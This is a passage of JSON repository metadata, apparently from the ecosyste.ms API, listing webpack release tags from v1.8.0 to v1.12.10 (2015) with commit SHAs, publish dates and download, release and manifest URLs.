ack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyst